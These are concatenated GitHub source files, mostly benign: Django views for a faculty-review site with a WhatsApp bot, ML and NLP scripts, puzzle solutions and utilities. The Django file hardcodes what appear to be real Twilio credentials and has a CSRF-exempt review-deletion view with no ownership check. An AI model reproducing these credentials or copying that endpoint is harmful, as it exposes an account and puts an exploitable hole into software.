UserFacultyRev.objects.get(review=rev_id)\n dislikes = rev.downvotes\n likes = rev.upvotes\n UserFacultyRev.objects.filter(review=rev_id).update(downvotes=dislikes - 1)\n UserFacultyRev.objects.filter(review=rev_id).update(upvotes=likes + 1)\n\n if get_rev.upvote == 1:\n # User Already liked this review\n # Remove like\n record = UserReactFaculty.objects.get(review_id=rev_id, user_id=user_id)\n try:\n record.delete()\n print('Record Deleted')\n except:\n print('Could not delete record')\n print('Here')\n rev = UserFacultyRev.objects.get(review=rev_id)\n likes = rev.upvotes\n UserFacultyRev.objects.filter(review=rev_id).update(upvotes=likes - 1)\n except:\n print('First time executing this')\n UserReactFaculty.objects.create(upvote=1, review_id=rev_id, user_id=user_id)\n\n rev = UserFacultyRev.objects.get(review=rev_id)\n likes = rev.upvotes\n UserFacultyRev.objects.filter(review=rev_id).update(upvotes=likes + 1)\n\n except RuntimeError:\n print('Could not execute')\n\n rev = UserFacultyRev.objects.get(review=rev_id)\n likes = rev.upvotes\n dislikes = rev.downvotes\n json_response = {\n 'likes': likes,\n 'dislikes': dislikes\n }\n return JsonResponse(json_response)\n\n msg = \"Could not like the review\"\n return HttpResponse(msg)\n\n\n@login_required(login_url='sign_in')\ndef dislike(request):\n if request.method == \"POST\":\n rev_id = request.POST.get('rev_id', None)\n uname = request.user.username\n user = User.objects.get(username=uname)\n user_id = user.id\n print(f'UserID is {user_id}')\n print(f'Rev id is {rev_id}')\n # First, check if the user has liked that review\n try:\n try:\n print('Here 1')\n get_rev = UserReactFaculty.objects.get(review_id=rev_id, user_id=user_id)\n if get_rev.upvote == 1:\n print('Here 2')\n UserReactFaculty.objects.filter(review_id=rev_id, user_id=user_id).update(upvote=0)\n UserReactFaculty.objects.filter(review_id=rev_id, user_id=user_id).update(downvote=1)\n rev = UserFacultyRev.objects.get(review=rev_id)\n dislikes = rev.downvotes\n likes = rev.upvotes\n UserFacultyRev.objects.filter(review=rev_id).update(downvotes=dislikes + 1)\n UserFacultyRev.objects.filter(review=rev_id).update(upvotes=likes - 1)\n\n if get_rev.downvote == 1:\n # User Already disliked this review\n # Remove dislike\n record = UserReactFaculty.objects.get(review_id=rev_id, user_id=user_id)\n try:\n record.delete()\n print('Record Deleted')\n except:\n print('Could not delete record')\n print('Here')\n rev = UserFacultyRev.objects.get(review=rev_id)\n dislikes = rev.downvotes\n UserFacultyRev.objects.filter(review=rev_id).update(downvotes=dislikes - 1)\n\n except:\n # Means the user has not liked that review\n print('First time interacting with the button')\n UserReactFaculty.objects.create(downvote=1, review_id=rev_id, user_id=user_id)\n\n rev = UserFacultyRev.objects.get(review=rev_id)\n dislikes = rev.downvotes\n UserFacultyRev.objects.filter(review=rev_id).update(downvotes=dislikes + 1)\n except:\n print('Could not execute')\n rev = UserFacultyRev.objects.get(review=rev_id)\n likes = rev.upvotes\n dislikes = rev.downvotes\n json_response = {\n 'likes': likes,\n 'dislikes': dislikes\n }\n return JsonResponse(json_response)\n\n msg = \"Could not dislike the review\"\n return HttpResponse(msg)\n\n\n@login_required(login_url='sign_in')\ndef report(request):\n if request.method == 'POST':\n rev_id = request.POST.get('rev_id', None)\n try:\n rev = UserFacultyRev.objects.get(review=rev_id)\n rev.report_count = rev.report_count + 1\n msg = 'Thank you for reporting the view'\n return HttpResponse(msg)\n except:\n print('Could not report review')\n msg = \"Could not report review\"\n return HttpResponse(msg)\n\n\n@csrf_exempt\n@login_required(login_url='sign_in')\ndef delete_review(request):\n if request.method == 'POST':\n print('Here')\n rev_id = request.POST.get('rev_id', None)\n print(rev_id)\n try:\n print('Here First')\n try:\n misc = FacultyMiscellaneous.objects.get(review_id=rev_id)\n misc.delete()\n except:\n print('Misc: ')\n\n try:\n personality = FacultyPersonality.objects.get(review_id=rev_id)\n personality.delete()\n except:\n print('Personality: ')\n\n try:\n workload = FacultyWorkload.objects.get(review_id=rev_id)\n workload.delete()\n except:\n print('Workload: ')\n\n record = UserFacultyRev.objects.get(review=rev_id)\n record.delete()\n print('Review')\n\n except:\n print('Could not delete review')\n print('Redirect to dashboard')\n return redirect(dashboard)\n\n return render(request, './error.html')\n\n\n@login_required(login_url='sign_in')\ndef change_username(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n new_username = request.POST.get('uname')\n user.username = new_username\n user.save()\n return HttpResponse(user.username)\n\n return render(request, './error.html')\n\n\n@login_required(login_url='sign_in')\ndef change_fname(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n new_fname = request.POST.get('fname')\n user.first_name = new_fname\n user.save()\n return HttpResponse(user.first_name)\n\n return render(request, './error.html')\n\n\n@login_required(login_url='sign_in')\ndef change_lname(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n new_lname = request.POST.get('lname')\n user.last_name = new_lname\n user.save()\n return HttpResponse(user.last_name)\n\n return render(request, './error.html')\n\n\n@login_required(login_url='sign_in')\ndef change_email(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n new_email = request.POST.get('email')\n user.email = new_email\n user.save()\n return HttpResponse(user.email)\n\n return render(request, './error.html')\n\n\ndef function_send_mail (user_email,subject,message):\n send_mail(\n subject,\n message,\n 'ratezone22@gmail.com',\n [user_email],\n fail_silently=False,\n )\n return 1\n\n\ndef language (request):\n request.session.modified = True\n\n if request.method == \"POST\":\n \n num = request.session.get('lan')\n\n print(num)\n\n if num is None:\n request.session['lan'] ='ar'\n elif request.session['lan'] =='ar' :\n request.session['lan'] = 'en'\n elif request.session['lan'] =='en' :\n request.session['lan'] = 'ar'\n \n \n print(request.session['lan'])\n # print(request.path_info)\n\n # return HttpResponseRedirect(\"/\")\n return redirect(home)\n \n\n\naccount_sid = 'AC769a838aa381b9b6e804efb14d04faf7'\nauth_token = '7e846e71e2c5cdf8e0941ecd4788e6ed'\nclient = Client(account_sid, auth_token)\n\n\n@csrf_exempt\ndef bot(request):\n \n \n if request.method == 'POST':\n message=request.POST[\"Body\"]\n message= message.split()\n print(message)\n how_send_name=request.POST[\"ProfileName\"]\n how_send_number=request.POST[\"From\"]\n\n str_m='Error'\n \n if (message[0]== \"Department\" or message[0]== \"department\") and len(message) ==1 :\n d = Department.objects.all().order_by('dept_name')\n\n str_m= 'Here all department in ku:\\n'\n j=1\n for i in d :\n str_m += '{}- {} \\n'.format(j,i)\n j+=1\n \n \n\n\n elif (message[0]== \"Department\" or message[0]== \"department\") and len(message)>1 :\n\n try:\n str_d=''\n for z in range(1, len(message)) :\n str_d+= '{}'.format(message[z])\n if(z<(len(message)-1)):\n str_d+= ' '\n\n # str_d+= 'A'\n print(str_d)\n\n d=Department.objects.get(dept_name=str_d)\n\n p = Employee.objects.filter(main_rank='Faculty', department_id=d.department).order_by('fname')\n # print(p)\n\n str_m= 'Here all Instructor in *{}* department:\\n'.format(d.dept_name)\n j=1\n for i in p :\n str_m += '{}- {} {}\\n'.format(j,i.fname,i.lname)\n j+=1\n\n if j==1:\n str_m='*NO Inofrmation to see*'\n\n except:\n str_m = 'Invalid Department name, Please try again'\n\n elif message[0]== \"Instructor\" or message[0]== \"instructor\" :\n\n try :\n \n fname = message[1]\n lname = message[2]\n\n em = Employee.objects.get(fname=fname, lname=lname)\n\n \n revs = UserFacultyRev.objects.filter(employee=em).order_by('-review')[0:3]\n rev_count = UserFacultyRev.objects.filter(employee_id=em.employee).aggregate(Count('review'))\n\n \n if(rev_count['review__count'] !=0):\n str_m= 'Here some information about Instructor:\\n*{} {}*\\n{} department \\n\\n'.format(message[1],message[2],em.department)\n str_m += 'Overall rating based on {} votes is: *{:.2f}/5*\\n\\n'.format(rev_count['review__count'],em.overall_rating)\n else :\n str_m= 'Here some information about Instructor:\\n*{} {}*\\n{} department \\n\\n'.format(message[1],message[2],em.department)\n str_m += '*Unfortunately* we don''t have any votes until now\\n\\n'\n j=1\n for i in revs :\n str_m += '{}- Overall is {}\\n thought is \"{}\"\\n'.format(j,i.overall_rating,i.student_thoughts)\n j+=1\n\n str_m += '\\nfor more information about {} {}\\nClick the URL:\\n*https://ratezone.io/instructor/{}/* \\n*OR* \\nyou can visit web site:\\n*ratezone.io* '.format(message[1],message[2],em.employee)\n\n except:\n str_m = 'Invalid Instructor name, Please try again'\n\n elif message[0]== \"Help\":\n str_m='*Department*\\nto list all departments\\n\\n*Department* \\nto list instructor names\\n\\n*Instructor* \\nsummary about instructor\\n',\n\n else :\n str_m = \"Wlcome {} to Rate zone BOT\\nsend *Help* to show available option.\\n\".format(how_send_name)\n \n\n \n \n m=client.messages.create(\n from_='whatsapp:+14155238886',\n body=str_m,\n to=how_send_number\n )\n\n # how_send_name=request.POST[\"ProfileName\"]\n # how_send_number=request.POST[\"From\"]\n # print(request.POST)\n print('Whatsapp connection :',how_send_number)\n return HttpResponse(\"thank you\")\n","repo_name":"mohamad-selman/RateZone-src","sub_path":"ratezone/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":34395,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"13253222045","text":"'''\nPerform runtime diagnostics on the ML classifiers.\n'''\n\nimport time\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier, PassiveAggressiveClassifier, Perceptron\nfrom settings import PERCENT_TRAIN\nfrom model import load, train_test_split\n\n### BUILD MODELS ###\n\nclassifiers = {\n 'SGD': SGDClassifier(loss='hinge', penalty='l2', alpha=1e-3, max_iter=10),\n 'Perceptron': Perceptron(),\n 'NB Multinomial': MultinomialNB(alpha=0.001),\n 'Passive-Aggressive': PassiveAggressiveClassifier()\n}\n\npre_processor = Pipeline([('vect', CountVectorizer(ngram_range=(1, 2))),\n ('tfidf', TfidfTransformer(use_idf=True))])\n\n\n### LOAD DATA ### \n\nclasses = list(range(21))\ntrain_snippets, train_labels, test_snippets, test_labels = train_test_split(PERCENT_TRAIN, load())\n\n### TRAIN VECTORIZER AND TRANSFORM RAW INPUT ###\n\ntrain_snippets_processed = pre_processor.fit_transform(train_snippets)\ntest_snippets_processed = pre_processor.transform(test_snippets)\n\n\n### BATCH DATA ###\n\nn_batch = 100\nn_train = len(train_snippets)\nbatch_size = int(n_train / n_batch)\n\ndef _batch(i):\n '''\n Get the (i+1)-th batch of train_snippets and train_labels.\n '''\n return train_snippets_processed[i*batch_size:(i+1)*batch_size], train_labels[i*batch_size:(i+1)*batch_size]\n\n\n### RUNTIME DATA ### \n\nstats = {}\nfor cls_name in classifiers:\n _stats = {'times': [], 'accuracies': [], 'n_examples': []}\n stats[cls_name] = _stats\n\n\n### MAIN LOOP ###\n\nfor i in range(n_batch):\n\n snippet_batch, label_batch = _batch(i)\n\n for cls_name, classifier in classifiers.items():\n stats[cls_name]['n_examples'].append(batch_size)\n\n # update estimator with examples in the current batch\n tick = time.time()\n classifier.partial_fit(snippet_batch, label_batch, classes=classes)\n stats[cls_name]['times'].append(time.time() - tick)\n\n # predict and record accuracy\n accuracy = classifier.score(test_snippets_processed, test_labels)\n stats[cls_name]['accuracies'].append(accuracy)\n\n\n### OUTPUT ###\n\nfname = 'data/exp3.txt'\nf = open(fname, 'w')\nf.write(str(stats))\nf.close()","repo_name":"andrewdircks/lang_classifier","sub_path":"runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73887036919","text":"'''Словарь - это набор пар ключ:значение.\nСамое главное отличие словаря от списка -\nэто наличие в нем ключей.\n'''\n\npallette = {\n 'red': '#ff335c',\n 'yellow': '#ffff85',\n 'mint': '#3eb489',\n 'violet': '#9933ff'\n} # для того, чтобы достать значение из словаря,\n# нужно обратиться к имени словаря, а в [] указать\n# название !!!КЛЮЧА!!!\nprint(f\"My favourite color is {pallette['violet']}!\")\n# это не работает: print(f\"My favourite color is {pallette['#ff335c']}!\")\nprint(pallette.keys()) # чтобы увидеть список всех ключей\n","repo_name":"GreatRaksin/Saturday3pm","sub_path":"1303_dictionaries_and_JSON/00_dictionaries_theory.py","file_name":"00_dictionaries_theory.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19951295139","text":"#!/usr/bin/env python\n# coding: utf8\n\"\"\"Example of training an additional entity type\nThis script shows how to add a new entity type to an existing pretrained NER\nmodel. To keep the example short and simple, only four sentences are provided\nas examples. In practice, you'll need many more — a few hundred would be a\ngood start. You will also likely need to mix in examples of other entity\ntypes, which might be obtained by running the entity recognizer over unlabelled\nsentences, and adding their annotations to the training set.\nThe actual training is performed by looping over the examples, and calling\n`nlp.entity.update()`. The `update()` method steps through the words of the\ninput. At each word, it makes a prediction. It then consults the annotations\nprovided on the GoldParse instance, to see whether it was right. If it was\nwrong, it adjusts its weights so that the correct action will score higher\nnext time.\nAfter training your model, you can save it to a directory. We recommend\nwrapping models as Python packages, for ease of deployment.\nFor more details, see the documentation:\n* Training: https://spacy.io/usage/training\n* NER: https://spacy.io/usage/linguistic-features#named-entities\nCompatible with: spaCy v2.1.0+\nLast tested with: v2.2.4\n\"\"\"\nfrom __future__ import unicode_literals, print_function\n\nimport plac\nimport random\nimport warnings\nfrom pathlib import Path\nimport spacy\nfrom spacy.util import minibatch, compounding\nimport pickle\nimport re\n\n\nfrom NER_KBC_MedicalTexts.model import en_ner_disease_chem, en_ner_bionlp\n\n\n\nimport en_core_web_lg\nnlp = en_core_web_lg.load()\n# nlp = en_ner_bionlp.load()\n# nlp = en_ner_disease_chem.load()\n\nDATA_DIR = \"data/processed/data_medium.json\"\n\n# new entity label\n# LABEL = \"ANIMAL\"\n\n# # training data\n# # Note: If you're using an existing model, make sure to mix in examples of\n# # other entity types that spaCy correctly recognized before. Otherwise, your\n# # model might learn the new type, but \"forget\" what it previously knew.\n# # https://explosion.ai/blog/pseudo-rehearsal-catastrophic-forgetting\n# TRAIN_DATA = [\n# (\n# \"Horses are too tall and they pretend to care about your feelings\",\n# {\"entities\": [(0, 6, LABEL)]},\n# ),\n# (\"Do they bite?\", {\"entities\": []}),\n# (\n# \"horses are too tall and they pretend to care about your feelings\",\n# {\"entities\": [(0, 6, LABEL)]},\n# ),\n# (\"horses pretend to care about your feelings\", {\"entities\": [(0, 6, LABEL)]}),\n# (\n# \"they pretend to care about your feelings, those horses\",\n# {\"entities\": [(48, 54, LABEL)]},\n# ),\n# (\"horses?\", {\"entities\": [(0, 6, LABEL)]}),\n# ]\n\n\n\n\n\nwith open(DATA_DIR, \"rb\") as fp: # Unpickling\n TRAIN_DATA = pickle.load(fp)\n# counter = 0\n# for data in TRAIN_DATA:\n# print(\"Grabbing sentence: \", str(counter+1))\n# # print(data[0])\n# if data[0] is \"\":\n# TRAIN_DATA.remove(data)\n# counter+=1\n#\n# with open(\"data/processed/new_data.json\", \"wb+\") as fp:\n# print(\"Saving trimmed data to: \", \"data/processed/new_data.json\")\n# pickle.dump(TRAIN_DATA, fp)\n\n\n\n@plac.annotations(\n model=(\"Model name. Defaults to blank 'en' model.\", \"option\", \"m\", str),\n new_model_name=(\"New model name for model meta.\", \"option\", \"nm\", str),\n output_dir=(\"Optional output directory\", \"option\", \"o\", Path),\n n_iter=(\"Number of training iterations\", \"option\", \"n\", int),\n)\n\n\n\ndef main(model=nlp, new_model_name=\"biomedical\", output_dir=\"model/002/\", n_iter=200):\n \"\"\"Set up the pipeline and entity recognizer, and train the new entity.\"\"\"\n random.seed(0)\n if model is not None:\n nlp = spacy.load(model) # load existing spaCy model\n print(\"Loaded model '%s'\" % model)\n else:\n nlp = spacy.blank(\"en\") # create blank Language class\n print(\"Created blank 'en' model\")\n # Add entity recognizer to model if it's not in the pipeline\n # nlp.create_pipe works for built-ins that are registered with spaCy\n if \"ner\" not in nlp.pipe_names:\n ner = nlp.create_pipe(\"ner\")\n nlp.add_pipe(ner)\n # otherwise, get it, so we can add labels to it\n else:\n ner = nlp.get_pipe(\"ner\")\n\n\n # # ner.add_label(\"ANIMAL\")\n ner.add_label(\"BACTERIA\") # add new entity label to entity recognizer\n # # Adding extraneous labels shouldn't mess anything up\n # ner.add_label(\"VIRUS\")\n # ner.add_label(\"DISEASE\")\n # ner.add_label(\"GENE\")\n # ner.add_label(\"BODY\")\n # ner.add_label(\"ANTIBIOTIC\")\n ner.add_label(\"PERSON\")\n ner.add_label(\"NORP\")\n ner.add_label(\"FAC\")\n ner.add_label(\"ORG\")\n ner.add_label(\"GPE\")\n ner.add_label(\"LOC\")\n ner.add_label(\"PRODUCT\")\n ner.add_label(\"EVENT\")\n ner.add_label(\"WORK_OF_ART\")\n ner.add_label(\"LAW\")\n ner.add_label(\"LANGUAGE\")\n ner.add_label(\"DATE\")\n ner.add_label(\"TIME\")\n ner.add_label(\"PERCENT\")\n ner.add_label(\"MONEY\")\n ner.add_label(\"QUANTITY\")\n ner.add_label(\"ORDINAL\")\n ner.add_label(\"CARDINAL\")\n\n\n\n\n if model is None:\n optimizer = nlp.begin_training()\n else:\n optimizer = nlp.resume_training()\n move_names = list(ner.move_names)\n # get names of other pipes to disable them during training\n pipe_exceptions = [\"ner\", \"trf_wordpiecer\", \"trf_tok2vec\"]\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n # only train NER\n with nlp.disable_pipes(*other_pipes) and warnings.catch_warnings():\n # show warnings for misaligned entity spans once\n warnings.filterwarnings(\"once\", category=UserWarning, module='spacy')\n\n sizes = compounding(1.0, 4.0, 1.001)\n # batch up the examples using spaCy's minibatch\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n batches = minibatch(TRAIN_DATA, size=sizes)\n losses = {}\n for batch in batches:\n texts, annotations = zip(*batch)\n nlp.update(texts, annotations, sgd=optimizer, drop=0.35, losses=losses)\n print(\"Losses\", losses)\n\n # test the trained model\n test_text = \"Shigella is a bacterium and Erbovirus is a virus. But horses are animals. Meltem is my name. John Smith is not. E.Coli is also a Bacterium.\"\n doc = nlp(test_text)\n print(\"Entities in '%s'\" % test_text)\n for ent in doc.ents:\n print(ent.label_, ent.text)\n\n # save model to output directory\n if output_dir is not None:\n output_dir = Path(output_dir)\n if not output_dir.exists():\n output_dir.mkdir()\n nlp.meta[\"name\"] = new_model_name # rename model\n nlp.to_disk(output_dir)\n print(\"Saved model to\", output_dir)\n\n # test the saved model\n print(\"Loading from\", output_dir)\n nlp2 = spacy.load(output_dir)\n # Check the classes have loaded back consistently\n assert nlp2.get_pipe(\"ner\").move_names == move_names\n doc2 = nlp2(test_text)\n for ent in doc2.ents:\n print(ent.label_, ent.text)\n\n\nif __name__ == \"__main__\":\n plac.call(main)\n","repo_name":"5Y5TEM/NLP-BioMed","sub_path":"named_entity_recognition.py","file_name":"named_entity_recognition.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"13999807332","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nimport os\nimport sys\nimport subprocess\nimport locale\nimport logging\n\nlogger = logging.getLogger('solvebio')\n\ntry:\n # reload() for Python3\n from importlib import reload\nexcept ImportError:\n pass\n\nstd_handles = [sys.stdin, sys.stdout, sys.stderr]\ntry:\n # Switch from the default input ASCII encoding to the default locale.\n # The Python runtime will use this when it has to decode a\n # string buffer to unicode. This is not needed in Python3.\n\n # However reload(sys), used below resets stdin, stdout, and stderr\n # which is bad if they've already been reassigned. An ipython\n # notebook shell, for example, sets up its own stdout.\n # See GitHub issue #43 and #21.\n reload(sys).setdefaultencoding(locale.getdefaultlocale()[1])\n locale.setlocale(locale.LC_ALL, '')\nexcept:\n pass\nfinally:\n sys.stdin, sys.stdout, sys.stderr = std_handles\n\n\n# Set rows and columns and colors\n\ndef set_from_env(name, default_value):\n try:\n return int(os.environ[name])\n except:\n return default_value\n\n\nTTY_ROWS = set_from_env('LINES', 24)\nTTY_COLS = set_from_env('COLUMNS', 80)\n\nTTY_COLORS = True\n\nif sys.stdout.isatty():\n try:\n with open(os.devnull, 'w') as fnull:\n rows, cols = subprocess.check_output(\n ['stty', 'size'],\n stderr=fnull).split()\n TTY_ROWS = int(rows)\n TTY_COLS = int(cols)\n except:\n logger.warn('Cannot detect terminal column width.\\nUsing value '\n 'from environment variables and/or internal defaults.')\nelse:\n TTY_COLORS = False\n\n\ndef pretty_int(num):\n return locale.format(\"%d\", int(num), grouping=True)\n\n\n# Basic color support\n\ndef green(text):\n if not TTY_COLORS:\n return text\n return '\\033[32m' + text + '\\033[39m'\n\n\ndef red(text):\n if not TTY_COLORS:\n return text\n return '\\033[31m' + text + '\\033[39m'\n\n\ndef yellow(text):\n if not TTY_COLORS:\n return text\n return '\\033[33m' + text + '\\033[39m'\n\n\ndef blue(text):\n if not TTY_COLORS:\n return text\n return '\\033[34m' + text + '\\033[39m'\n\n\ndef pager(fn, **kwargs):\n try:\n import tty\n fd = sys.stdin.fileno()\n old = tty.tcgetattr(fd)\n tty.setcbreak(fd)\n\n def getchar():\n sys.stdin.read(1)\n except (ImportError, AttributeError):\n tty = None\n\n def getchar():\n sys.stdin.readline()[:-1][:1]\n\n try:\n page = 1\n res = fn(page=page, **kwargs)\n has_next = res.links['next']\n sys.stdout.write(str(res) + '\\n')\n\n while has_next:\n sys.stdout.write('-- More --')\n sys.stdout.flush()\n c = getchar()\n page += 1\n res = fn(page=page, **kwargs)\n has_next = res.links['next']\n\n if c in ('q', 'Q'):\n sys.stdout.write('\\r \\r')\n break\n\n sys.stdout.write('\\n' + str(res) + '\\n')\n finally:\n if tty:\n tty.tcsetattr(fd, tty.TCSAFLUSH, old)\n","repo_name":"solvebio/solvebio-python","sub_path":"solvebio/utils/printing.py","file_name":"printing.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"3642193676","text":"class Solution:\n # @param words, a list of strings\n # @param L, an integer\n # @return a list of string\n \n def fullJustify(self, words, L):\n result=[]\n candid=[]\n cur_L=0\n for temp in words:\n if candid==[]:\n candid.append(temp)\n cur_L+=len(temp)\n else:\n if cur_L+1+len(temp)>L: #we can't hold another word in this line\n #now it's time to pour candid into result\n if len(candid)==1:\n temp_line=candid[0]+' '*(L-len(candid[0]))\n else:\n num_space=(L-cur_L)/(len(candid)-1)\n left_add=(L-cur_L)%(len(candid)-1) # decide the number of left words having additional space\n temp_line=candid[0]\n for i in range(1,len(candid)):\n if left_add>0:\n left_add-=1\n temp_line+=' '*(num_space+2)+candid[i]\n else:\n temp_line+=' '*(num_space+1)+candid[i]\n result.append(temp_line)\n #now start over again\n candid=[temp]\n cur_L=len(temp)\n else:\n candid.append(temp)\n cur_L+=len(temp)+1\n if candid==[]: return [] #nothing left\n else:\n temp_line=candid[0]\n for i in range(1,len(candid)):\n temp_line+=' '+candid[i]\n temp_line+=' '*(L-cur_L)\n result.append(temp_line) \n return result\n","repo_name":"ssydyc/Leetcode_python","sub_path":"Text_Justification.py","file_name":"Text_Justification.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16596246438","text":"import random\n\"\"\"\nClasses concerning the game objects.\nApples, walls, static and movable objects\n\"\"\"\n\n\nclass StaticObject:\n\n def __init__(self, tag, x, y):\n self._id = tag\n self._x = x\n self._y = y\n\n\nclass MovableObject(StaticObject):\n\n def __init__(self, tag, x, y, direction):\n super().__init__(tag, x, y)\n self._direction = direction\n\n\nclass Apple(StaticObject):\n\n def __init__(self, tag, x, y):\n super().__init__(tag, x, y)\n self._value = random.randint(0, 10)\n\n if self._value < 3:\n self._color = (255, 0, 0)\n elif self._value >= 3 and self._value < 6:\n self._color = (0, 255, 0)\n elif self._value >= 6 and self._value <= 9:\n self._color = (0, 0, 255)\n elif self._value == 10:\n self._color = (242, 255, 0)\n\n\nclass Wall:\n\n def __init__(self, tag, x_i, y_i, x_f, y_f):\n self._id = tag\n self._x_i = x_i\n self._y_i = y_i\n self._x_f = x_f\n self._y_f = y_f\n","repo_name":"eHonnef/python-snakes","sub_path":"Objects.py","file_name":"Objects.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38008006306","text":"# 딕셔너리\n\nd = {}\n\n# 키에 리스트를 지정하면 오류:\n# 리스트는 변하는 성질을 가진 자료형\n# TypeError: unhashable type: 'list'\nlk = [1,3,5]\nlv = [1,3,5,7,9]\nd[lk] = lv\nprint(d)","repo_name":"jinygod/Programming-Language","sub_path":"python/syntax/dicts/s04-dict-list-2.py","file_name":"s04-dict-list-2.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15590248250","text":"from typing import List\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n # We can first sort the array (O nlogn), and say we want to acheieve a+b+c=0\n # We can lock the \"a\" and solve the TwoSum problem with target=\"-a\" (O n) \n # And if \"a\" is >= 1, we can finish the problem \n # After we finish the \"a\", we have to jump to the last \"a\" if there are duplicate \"a\"s\n \n # For the two sum problem, we can use \"left\" and \"right\" pointers\n # if the sum is bigger than \"-a\", we move \"right\" - 1\n # if the sum is less than \"-a\", we move \"left\" + 1\n \n res = []\n nums.sort()\n \n for i in range(len(nums)):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n \n if nums[i] >= 1:\n break\n \n target = -nums[i]\n l, r = i + 1, len(nums) - 1\n \n while l < r:\n s = nums[l] + nums[r]\n if s > target:\n r -= 1\n elif s < target:\n l += 1\n else:\n res.append([nums[i], nums[l], nums[r]])\n l += 1\n while nums[l] == nums[l-1] and l < r:\n l += 1\n return res\n","repo_name":"windsuzu/Leetcode-Python","sub_path":"code/array/3-sum.py","file_name":"3-sum.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34626851158","text":"import torch\nfrom torch import Tensor\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom typing import Optional\n\n\"\"\"\nLinear Function for Graph\nIt combines dropout, linear, activation layers.\n\nArgs:\n node_input_size: the number features of node in the linear layer inputs (required)\n edge_input_size: the number features of edge in the linear layer inputs (optional)\n cond_size: the number of feature of condition vector (optional)\n node_output_size: the number features of node in the linear layer outputs (required)\n edge_output_size: the number features of edge in the linear layer outputs (optional)\n activation: the activation function (required)\n dropout: the dropout value (required)\n\nInput:\n nodes: the nodes' feature (required)\n edges: the edges' feature (optional)\n condition: the condition vector's feature (optional)\n\nShape:\n nodes: (N, V, Fv)\n edges: (N, V, V, Fe)\n condition: (N, Fl) or (N, V, Fl)\n\nNote:\n if a condition vector exists, it is combined with the nodes feature vector.\n >> condition = condition.repeat(1, num_nodes, 1) (when the dim of condition is (N, F))\n >> nodes = torch.cat([nodes, condition], -1)\n\nOutput:\n nodes: (N, V, Fv')\n edges: (N, V, V, Fe') (optional)\n\"\"\"\n\nACT_LIST = {\n 'relu': F.relu, \n 'tanh': torch.tanh, \n 'sigmoid': torch.sigmoid, \n 'leaky_relu': F.leaky_relu\n}\n\nclass GraphLinear(nn.Module) :\n def __init__(self, node_input_size: int, edge_input_size: Optional[int], cond_input_size: Optional[int],\n node_output_size: int, edge_output_size: Optional[int], activation: str, dropout: float) :\n super(GraphLinear, self).__init__()\n if cond_input_size is None :\n cond_input_size = 0\n self.node_linear = nn.Linear(node_input_size + cond_input_size, node_output_size)\n if edge_input_size is not None and edge_input_size != 0 :\n self.edge_linear = nn.Linear(edge_input_size, edge_output_size)\n self.activation = ACT_LIST.get(activation, None)\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, nodes: Tensor, edges: Optional[Tensor] = None, condition: Optional[Tensor] = None) :\n assert (edges is None) ^ (hasattr(self, 'edge_linear'))\n if condition is not None :\n cs = condition.size()\n if len(cs) == 2 : # condition: [B, F]\n num_nodes = nodes.size(1)\n condition = condition.unsqueeze(1)\n condition = condition.repeat(1, num_nodes, 1)\n elif len(cs) == 3 : # condition: [B, N, F]\n pass\n else :\n print(\"ERROR: Argument 3 of GraphEmbedding layer should be [batch, num_node, feature] or [batch, feature]\")\n exit(-1)\n nodes = torch.cat([nodes, condition], -1)\n\n _nodes = self.dropout(nodes)\n _nodes = self.node_linear(_nodes)\n if self.activation is not None :\n _nodes = self.activation(_nodes)\n\n if edges is not None :\n _edges = self.edge_linear(edges)\n if self.activation is not None :\n _edges = self.activation(_edges)\n return _nodes, _edges\n else :\n return _nodes\n\nclass Linear(nn.Module) :\n def __init__(self, input_size: int, output_size:int, activation: str, bias: bool, dropout: float) :\n super(Linear, self).__init__()\n self.linear = nn.Linear(input_size, output_size, bias=bias)\n self.dropout = nn.Dropout(p=dropout)\n self.activation = ACT_LIST.get(activation, None)\n \n def forward(self, x: Tensor) :\n _x = self.dropout(x)\n y = self.linear(_x)\n if self.activation is not None :\n y = self.activation(y)\n return y\n","repo_name":"jaechang-hits/BBAR-pytorch","sub_path":"src/layer/layers/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"41066054645","text":"import os\nfrom random import shuffle\nfrom time import time\n\nimport cv2\nimport numpy as np\nimport pytesseract\nfrom progress.spinner import Spinner\n\nimport arguments as args\nimport consts as 